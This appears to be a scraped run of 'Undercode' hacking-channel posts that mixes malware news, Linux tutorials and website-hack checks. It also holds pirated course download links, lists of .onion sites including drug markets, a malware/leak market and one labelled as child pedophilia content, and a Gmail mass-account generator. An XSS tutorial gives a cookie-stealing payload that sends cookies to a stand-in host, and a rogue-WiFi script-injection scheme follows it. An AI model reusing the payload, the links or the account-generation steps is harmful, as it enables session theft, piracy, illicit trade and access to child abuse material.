🦑CSS: Variable Fonts -190 MB-

https://www.lynda.com/CSS-tutorials/CSS-Variable-Fonts/2822020-2.html

https://mega.nz/#F!c4E1SYjT!_2bfTEyy-oRfy6E_unAsSw

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ThanatosMiner is here, to capture the mining Trojan spread by BlueKeep high-risk vulnerability attacks
#News

> the ThanatosMiner mining Trojan exploited the BlueKeep vulnerability CVE-2019-0708 to spread. The attacker packaged the public Python version BlueKeep exploit code to generate scan.exe, and scanned a large range of randomly generated IP addresses for detection and attack.

> After the vulnerability is successfully exploited, the shellcode is executed to download the Trojan svchost.exe written in C#, and then the Trojan is used to download the Monero mining Trojan and attack modules for the next round of attacks. Because the assembly name of the Payload program is ThanatosCrypt, the mining Trojan is named ThanatosMiner (Death Miner).

> On May 15, 2019, Microsoft released a security update for CVE-2019-0708, a critical remote code execution vulnerability in Remote Desktop Services, which affected some older versions of Windows. Once the attacker successfully triggers the vulnerability, he can execute arbitrary code on the target system. The triggering of the vulnerability does not require any user interaction-meaning that the computer with the vulnerability only needs to be connected to the Internet, and no remote operations may be encountered without any operation. Attack and fall. The BlueKeep vulnerability (CVE-2019-0708) is a high-risk vulnerability that all security vendors attach great importance to.

> The vulnerability affects older versions of Windows systems, including:
Windows 7, Windows Server 2008 R2, Windows Server 2008, Windows 2003, and Windows XP. Windows 8 and Windows 10 and later versions are not affected by this vulnerability.

written by undercode
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FOR BEGINER GNU and Windows

> To build programs using the GNU toolchain on Windows, two projects are often used: Cygwin and MinGW + MSYS. They have similar goals, but different implementation details. Let's figure it out.

🦑 Cygwin

1) Cygwin is the most complete implementation of the GNU environment for Windows. It provides most of the POSIX API as a library, which allows you to build programs from UNIX without porting, unless they require UNIX semantics. A striking example is demons, they also need fork()signals that are not in Windows, and Windows services are completely different.

2) In addition to the library, the distribution kit contains a set of classic UNIX commands and a terminal. Command implementations use this library and support some UNIX features, such as case-sensitive file names.

3) Intended use: if there is no desire or ability to port the program to Windows or use only platform independent APIs, it can be built "under Cygwin", at the cost of dependence on cygwin1.dlland relative isolation from the rest of the system.

4) Many people have installed and continue to install the Cygwin environment to be able to use classic UNIX commands on Windows. Some developers also include Cygwin in their instructions for building their Windows programs, although the program itself does not link with cygwin1.dll. It may be more correct to use MSYS for this purpose.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑NEW DEEP DANGEROUS WEBSITES Non-English
7/24 & 24/24 ALIVE

http://germanyhusicaysx.onion - Deutschland im Deep Web - German forum

http://ffi5v46ttwgx3fby.onion/ - Das ist Deutschland hier 2.0 - German Board

http://paisleli66axejos.onion/ - PAIS

http://hyjmkmb3lfymiprp.onion/hen/papieze/ - Dziecięca pedofilia

http://runionv62ul3roit.onion/ - Russian Onion Union

http://s6cco2jylmxqcdeh.onion/ - ?ltimos bumps

http://5xki35vc4g5ts6gc.onion - GTF Greek Tor Forum . For greek speaking users

http://cipollatnumrrahd.onion/index.php - Cipolla 2.0 - Italian Community

http://runionv62ul3roit.onion - Russian community: market and anonymous talks about security, guns etc.

http://ptrackcp2noqu5fh.onion/ - PoliceTrack - Ne vous faites plus suivre par la police.

http://amberoadychffmyw.onion - Amberoad - russian anonymous market

http://r2d2akbw3jpt4zbf.onion - R2D2 - russian anonymous market

http://ramp2bombkadwvgz.onion - RAMP - biggest russian market (drugs only)

http://szmyt4v4vjbnxpg3.onion/ - Славянский

http://o2tu5zjxjlibrary.onion/ - Bibliotheca Alexandrina

http://xzzpowtjlobho6kd.onion/wordpress/ - DeepBlog

http://zqiirytam276uogb.onion/ - Thorlauta

http://ocbh4hoqs37unvv6.onion - French Deep Web

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑VPS & LEAK .ONION 7/24 & 24/24 ALIVE
https://www.torproject.org/

http://torvps7kzis5ujfz.onion/ – TorVPS

http://novarcbekzy3xwcq.onion/ – Home :: NOVA LABS

http://s5q54hfww56ov2xc.onion/ – BitPharma – biggest european .onion drug store – Cocaine for Bitcoins, Psychedelics for Bitcoins, Prescriptions for Bitcoins, Viagra for Bitcoins

http://kp6yw42wb5wpsd6n.onion/ – Login · Minerva

http://onionlandbakyt3j.onion/ – Onionland · Enjoy the rides, but you might die.

http://4apu65ago3nbpbaf.onion/ – SHARE ! This deep web links list is provided by http://hiddenwikitor.org/ and http://wiki5kauuihowqi5.onion/

http://5xgrs443ogbyfoh2.onion/ – Tor Project: Anonymity Online

http://kpj3orlxmfs6yqah.onion/ – Products – MUSHBUD

http://sejnfjrq6szgca7v.onion/ – Debian — The Universal Operating System

http://familybw6azkhjsc.onion/ – My Family Videos

http://7rmath4ro2of2a42.onion/ – SoylentNews: SoylentNews is people

http://zcashph5mxqjjby2.onion/ – Zcash – All coins are created equal.

http://exoduockgfq3ikf7.onion/ – Ex0du$ – Malware,Leaks,Exploits,Dumps and more!

http://dr5aamfveql2b34p.onion/ – VuzeWiki

http://hbooruahi4zr2h73.onion/ – HBS

http://4fvfamdpoulu2nms.onion/ – Lucky Eddie’s Home

http://tmskhzafkndqaqyx.onion/ – DreamMarket Forum

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HOW INSTALL TOR IN KALI 2 STEPS :

How To Install Tor Browser In Kali Linux Using Apt
Open a terminal window

1) Run apt-get update

2) Run apt-get install tor torbrowser-launcher and select Y at the prompt

3) Now you’ll have a new Tor Browser application in the Applications menu under Usual Applications and Internet.

> This shortcut will only work if you’re not running as the root user.
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Be wary of the BasedMiner mining Trojan blasting weak SQL passwords to invade mining :
#News

> The mining Trojan gang mainly targeted MS SQL services to blast weak password attacks. After successful blasting, it will download the Gh0st remote control Trojan to control the system. It will also use multiple Windows vulnerabilities to perform privilege escalation attacks to obtain the highest system privileges and implant Monroe. The coin mining Trojan has been mining and has made a profit of 8,000 yuan.

> Because its remote control module is named based.dll, Tencent Security Center named it BasedMiner. After the BasedMiner invasion, the remote control Trojan is implanted in the enterprise server, which may lead to the leakage of confidential information of the victimized enterprise.

> When mining, the server resources will be seriously consumed, which will affect the normal business operation. Tencent security experts recommend that companies check and correct the use of weak passwords to log in to the server, repair security vulnerabilities in the server, and avoid intrusion by mining gangs.

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Build your own Instagram-facebook App with Swift -3.82 GB-

https://www.skillshare.com/classes/Build-an-Instagram-Clone-App-with-Swift/1410999441

https://mega.nz/#F!RbgQ2YJZ!1XxFQxPvGQcioAWQYoZihA

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Synchronizing local and remote directories in Linux using Lsyncd ?

Installing Lsyncd


1️⃣On Debian and its derivatives, such as Ubuntu , Linux Mint, run the following command to install Lsyncd:

> sudo apt-get install lsyncd


2️⃣On RHEL, CentOS , you need to enable the Epel repository first.

a) sudo yum install epel-release


b) Then install Lsyncd with the command:

> sudo yum install lsyncd

> Lsyncd configuration on Debian and Ubuntu and derivatives

> Lsyncd does not provide a default configuration file on DEB based systems.

c) We need to create it manually. However, Lsyncd includes some sample configuration files that are useful to get a general idea of ​​how to do synchronization. The configuration example files will be found under the directory “/ usr / share / doc / lsyncd - * / examples” .

> ls / usr / share / doc / lsyncd / examples /

d) Output example:

lbash.lua lgforce.lua lpostcmd.lua lrsyncssh.lua
lecho.lua limagemagic.lua lrsync.lua

e) As you can see in the above output, each config file is with a .lua extension. This is because the lsync configuration file is written using the Lua programming language. Let's take a look at a sample configuration file.

> cat /usr/share/doc/lsyncd/examples/lrsync.lua


f) The Lrsync configuration file looks like this:

----
- User configuration file for lsyncd.
-
- Simple example for default rsync.
-
settings = {
statusFile = "/tmp/lsyncd.stat",
statusInterval = 1,
}

sync {
default.rsync,
source = "src",
target = "trg",
}

enjoy ❤️👍🏿
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑GENERATE UNLIMITED GMAILS :

1️⃣DOWNLOAD :

> https://pypi.org/search/?c=Environment+%3A%3A+Win32+%28MS+Windows%29
(WIN)

> https://pypi.org/project/PyAutoGUI/ (for linux)

1) $ sudo apt-get install python-virtualenv

2) $ virtualenv --no-site-packages ~/venv

3) $ source ~/venv/bin/activate

4) $ mkdir -p ~/PIL ~/temp/site-packages

5) $ export PYTHONPATH=~/temp/site-packages/

6) $ cd ~/PIL

7) $ wget http://effbot.org/downloads/Imaging-1.1.7.tar.gz

8) $ sudo apt-get build-dep python-imaging
# sets up zlib1g-dev, libfreetype6-dev, libjpeg62-dev, liblcms1-dev, ...

9) $ easy_install -v --install-dir ~/temp/site-packages --find-links ~/PIL\
--allow-hosts=None --always-unzip Imaging

2️⃣get firefox browser https://www.mozilla.org
/sp/firefox/new/

3️⃣git clone https://github.com/unix121/gmail-generator.git

4️⃣cd gmail-generator


5️⃣python3 gmail_generator.py

(use tor server)
6️⃣checkout the video tutorial after this post

enjoy ❤️👍🏿
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

generate unlimited gmails

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑HOW TO CHECK IF YOUR WEBSITE IS HACKED FOR BEGINERS :

1. The hacked website has a feature in the data, that is, the amount of index and the traffic from search engines have increased dramatically in a short period of time . Therefore, webmasters can benefit from the indexing tool of Baidu webmaster platform and observe whether there is any abnormality in the site's collection; if there is a sudden increase, then use the traffic and keyword tool to check whether the keywords obtained by the traffic are related to the website, whether they involve gambling and pornography. .

2. Inquiring the site through Site grammar, combined with some common pornographic and gaming keywords, the effect is better, and it is possible to find illegal pages that do not belong to the site.

3. Due to the huge traffic of Baidu, some hacked behaviors only redirect the traffic brought by Baidu, which is difficult for the webmaster to find. Therefore, when checking whether your site is hacked, you must click on the site page from the Baidu search results to view Did you jump to other sites?

4. The content of the site is prompted in the search results to be risky.

*Subsequently, you can ask website technicians to further confirm whether the website is hacked through background data and programs


WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑After confirming that the website is hacked, in addition to prompting technical staff to make quick corrections, SEO staff also need to do some after-care and preventive work.

1. Stop the website service immediately to prevent users from continuing to be affected and prevent other sites from being affected (a 503 return code is recommended).

2. If multiple sites of the same hosting provider are hacked during the same period, you can contact the hosting provider to urge the other party to respond.

3. Clean up the discovered hacked content, set the hacked page as a 404 dead link, and submit it through the dead link submission tool of the Baidu webmaster platform.

4. Sort out the possible hacked time, compare it with the file modification time on the server, and process the files uploaded and modified by hackers; check the user management settings in the server to confirm whether there are abnormal changes; change the user of the server Access password. Note: You can determine the possible hacking time from the access log. But hackers may also modify the server's access log.

5. Do a good job in security, check the loopholes in the website, and prevent it from being hacked again.


WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑A ransomware program called RAA has recently appeared, written entirely in JavaScript, which can lock users' files by using a strong encryption program.

H O W I T W O R K ' S ?

> Most malware in Windows is written in a compiled language such as C or C++, and is distributed in the form of executable files such as .exe or .dll. Other malware is written using command-line scripts, such as Windows batch and PowerShell.

> The malware on the client side is rarely written in web-related languages, such as JavaScript, which is mainly interpreted by the browser. But the built-in Script Host of Windows can also directly execute .js files.

> Attackers have only recently started using this technology. Last month, Microsoft warned that js attachments in malicious emails may carry viruses, and ESET’s Security Research Institute also warned that certain js attachments may walk the Locky virus. But in both cases, JavaScript files are used as a downloader of malware. They download from other addresses and install traditional malware written in other languages ​​by default. But RAA is different, this is malware written entirely in JavaScript.

> Experts at the BleepingComputer.com technical support forum said that RAA relies on CryptoJS, a secure JavaScript library, to implement its encryption process. The implementation of encryption is very solid, using the AES-256 encryption algorithm.

> Once the file is encrypted, RAA will add .locked to the suffix of the original file name. Its encryption targets include: .doc, .xls, .rtf, .pdf, .dbf, .jpg, .dwg, .cdr, .psd, .cd, .mdb, .png, .lcd, .zip, .rar And .csv.

> Lawrence Abrams, the founder of BleepingComputer.com, said in a blog post: "Under the current circumstances, there is no way to decrypt except payment.

> According to the user's response, after being infected with RAA, messages in Russian will be randomly displayed, but even if it targets Russian computers, its proliferation is only a matter of time.

> It's not normal to include JavaScript attachments in emails, so users are advised to avoid opening such files, even if they are included in .zip compressed files. .js files are rarely used anywhere except in websites and browsers.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Reflected XSS-ALL YOU NEED TO KNOW :

The reflection-based XSS attack mainly relies on the script returned by the server of the site, which triggers execution on the client to launch a web attack.

example:

1) Make a hypothesis, when Amazon is searching for books, the submitted name is displayed when no books are found.

2) Search for content in the search box, fill in "<script>alert('handsome boy')</script>", and click search.

3) The current page does not filter the returned data and displays it directly on the page, and then the alert string will come out.

4) Then you can construct the address to obtain the user's cookies, and let others click on this address through QQ group or spam:

> http://www.amazon.cn/search?name=<script>document.location='http://xxx/get?cookie='+document.cookie</script>
S: Of course, this address is invalid, it's just an example.

🦑in conclusion:

If you only succeed in steps 1, 2, and 3, you are just tossing yourself. If you succeed in step 4, it is a decent XSS attack.

Develop safety measures:

1) When the front end displays the server data, not only the label content needs to be filtered and escaped, but even the attribute value may also be needed.

2) When the backend receives the request, it verifies whether the request is an attack request, and the attack is blocked.

E.g:

label:

<span><script>alert('handsome boy')</script></span>
Escape

<span>&lt;script&gt;alert(&#39;handsome boy&#39;)&lt;/script&gt</span>

> Attributes:

3) If the value attribute of an input is

> onclick="javascript:alert('handsome boy')
May appear


<input type="text" value="..." onclick="javascript:alert('handsome boy')">

4) Clicking on input causes the attack script to be executed. The solution can be to filter the script or double quotes.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑DOM-based or local XSS-tutorial

Based on DOM or local XSS attacks. Generally, a free wifi is provided, but a gateway that provides free wifi will insert a script into any page you visit or directly return a phishing page, thereby implanting malicious scripts. This kind of direct existence on the page without returning through the server is a local XSS attack.

Example 1:

1. Provide a free wifi.

1. Start a special DNS service, resolve all domain names to our computer, and set the Wifi DHCP-DNS to our computer IP.

2. After the user connected to wifi opens any website, the request will be intercepted by us. We forward to the real server according to the host field in the http header.

3. After receiving the data returned by the server, we can inject the web script and return it to the user.

4. When the injected script is executed, the user's browser will preload the common script libraries of major websites in turn.

WRITTEN BY UNDERCODE
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁